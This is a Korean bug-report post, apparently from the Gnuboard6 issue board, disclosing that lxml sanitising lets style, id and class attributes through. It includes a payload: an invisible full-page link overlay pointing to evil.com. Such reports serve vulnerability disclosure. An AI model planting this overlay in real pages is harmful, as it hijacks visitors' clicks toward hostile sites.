CSS, ID, CLASS misconfigure로 인한 취약점

mingijunggrape

· 9개월 전 · 조회 363 363

lxml은 css 및 id, class 부분을 필터링 하지 않기 때문에 이를 조합하면 Open redirect, 광고 사이트 popup 등의 취약점이 발생될 수 있습니다.

영상에서 사용한 페이로드 입니다.

`<a href="https://evil.com" class="win_password_lost"
style="position:absolute; top:0; left:0; width:100%; height:100%; opacity:0.001; z-index:9999;">
Click me
</a>
`

https://github.com/user-attachments/assets/8b5f5ac9-d4b9-48e8-89e5-8077204f901f

제목	글쓴이	날짜	조회
Unauthorized User Info Disclosure via IDOR [1]	oxqnd 이 비회원 글보기	7개월 전	조회 378
Open Redirect Vulnerability [1]	NinjaGPT 이 비회원 글보기	7개월 전	조회 304
Stored XSS vulnerability [1]	NinjaGPT 이 비회원 글보기	7개월 전	조회 395
CSS, ID, CLASS misconfigure로 인한 취약점	mingijunggra... 이 비회원 글보기	9개월 전	조회 364
CSRF LOGOUT 기능	mingijunggra... 이 비회원 글보기	9개월 전	조회 341
에러발생 [3]	tlsdlftn79 이 비회원 글보기	1년 전	조회 396
[python] 공지 작성 시 게시글 + 공지 두개가 되는 현상	seiblog-nand... 이 비회원 글보기	1년 전	조회 602
CORS Misconfiguration 취약점 제보합니다. [3]	AkiaCode 이 비회원 글보기	1년 전	조회 708
[python] 관리자가 게시글을 수정할 수 없는 이슈	seiblog-nand... 이 비회원 글보기	1년 전	조회 576
[rest_api][1차수정] 최근 게시물 출력 이슈	seiblog-nand... 이 비회원 글보기	1년 전	조회 474
[rest_api] 미사용 api 제보	seiblog-nand... 이 비회원 글보기	1년 전	조회 571
[rest_api] 자동 저장 이슈 2가지	seiblog-nand... 이 비회원 글보기	1년 전	조회 474
메일 템플릿 태그 요소가 그대로 보여지는 이슈	seiblog-nand... 이 비회원 글보기	1년 전	조회 469
[python] 로그인 이후 회원가입 재시도 시 정상적으로 회원가입 되는 이슈	seiblog-nand... 이 비회원 글보기	1년 전	조회 420
[건의?] 비밀번호 재확인 api 호출	seiblog-nand... 이 비회원 글보기	1년 전	조회 460
QA MAIL TEMPLATE 적용 누락 부분	seiblog-nand... 이 비회원 글보기	1년 전	조회 499
[rest_api] 게시글 목록 수 출력 오류	seiblog-nand... 이 비회원 글보기	1년 전	조회 521
[rest_api] 게시글 / 댓글 등록 시 딜레이 미적용 현상	seiblog-nand... 이 비회원 글보기	1년 전	조회 468
[rest_api] 정확한 판단 및 내용을 확인할 수 없어 이슈 등록 [2]	seiblog-nand... 이 비회원 글보기	1년 전	조회 521
[건의] 업데이트 패치 파일만 업로드 해주실수 없나요?ㅠ [1]	seiblog-nand... 이 비회원 글보기	1년 전	조회 476

제목

글쓴이

날짜

조회

Unauthorized User Info Disclosure via IDOR [1]

oxqnd

CSS, ID, CLASS misconfigure로 인한 취약점

링크

그누보드6 이슈